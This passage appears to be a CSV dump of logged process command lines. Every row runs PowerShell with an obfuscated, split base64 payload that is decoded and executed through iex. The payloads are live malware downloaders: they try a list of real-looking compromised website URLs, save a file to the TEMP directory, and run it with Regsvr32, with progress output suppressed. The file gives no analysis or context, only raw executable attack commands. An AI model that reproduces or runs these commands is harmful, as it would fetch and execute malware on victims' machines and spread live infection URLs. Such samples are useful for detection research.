ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'Lhb5rkrXkRTHhFgxr/pRvDml0Qk3NCg78rI6IKQqJSJu4uE4Tdj+a8w2BEJKzN1DFUf4lJbm';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'NC8sWue4wpa87Dk5JXGJGe0a3bOi1WnGPiq5IYuVOy+ljdfvsJZdkgpZ1fUQEJXE5tpiBGxp';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'O+erVBgYLyLNYFf1deYSFETXkIxutTUjs12f2nEYbxIDXrAUlEQIxJROfqmb9PSJ2tXoYX8b';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'OZPcAn3qnqu8Ne3jS3iebxE+DC2FlUCG2YxZksDE4f9A4/4jXzP3KFUxNbVU7VPIch9aaD86';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'Or06oIK7HMG4w+sqYqrykslZmIyFaJrImqHjj5NFq1+QojEEYtbwzZbc+v/Au8YDQI+wHTOL';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'Q9jdUqoe/twacccliiKPKQXCdW6pBjwmIiljQP4UoO63UeDjBW0RuEKyCVeECCs6ZOedatqd';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'RbAjhRzMTTxIRhR4J7OEOPdGtx57Jgh1gg69wJ3S4FmO/ZPkbHNtEYcDxHobBZAO8oxPNY+i';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'S4tLTGtIhnmYZGMggVvn63wBJbmIKXa+gb99woe2272QcM+2WCYJhmACmTzGXEJn3FWcBZID';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'S9cmDVWj5sLoADc01Ji6rJvdTgJ7k9cKXXTxRXBR8uCLWWjQF8SWTWbziYrBuWbYOckBjN7D';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'STFfic6DzdsBIE6q/AGkq3O32Tq40ZF8YXbhLg2BQbJjed+e0l9tFsCCWa8Bh9Uq58E68JDm';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'T++1oEJrX24YWbOAUc98gAdy6JBhwSC9yaKnCWW7AQr5DRVZPU1I7+E4wWtCNhFdW9Nh326u';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'UmJOcxJrIXN6GKvyI8yMle9qKwMgVSlt1Vq7ou13hn+YBvyVVwRG1gcv7W6e528rud33UlUR';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'VIQXOq7roo69QlzCz0VASvOO2eTQi9IosW/BtwYf/Znuh3ixaMOYuL7x0hJBZlWjPejc0r6S';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'W2YpTuN2zpuM1h/irhAK44ZFKdUxcVHsL9hxuj/jQjjUPm2d4AU+i9GQTX4M01HAu4LENjNe';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'W6P+TI0bRmTwVsBWPfXXZW9Up4W4HPU0BSnWnegyP6E7ZcXPUprNRZiA8DH/EoYMYpAbsl+t';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'XgouXiyWDVwrMMC6HPYw5lQ3pqIF3lbncsdGGC72ymWsfK9ZH/YyiKjaa9paMR4rxWPVl3fw';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'YmMePXIsQ93+FAFLgxqoYPphKPmzcf5UrMSe4rTjXv+0JwdbCMqQF6t+tMcgWMdzecQAN1Hw';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.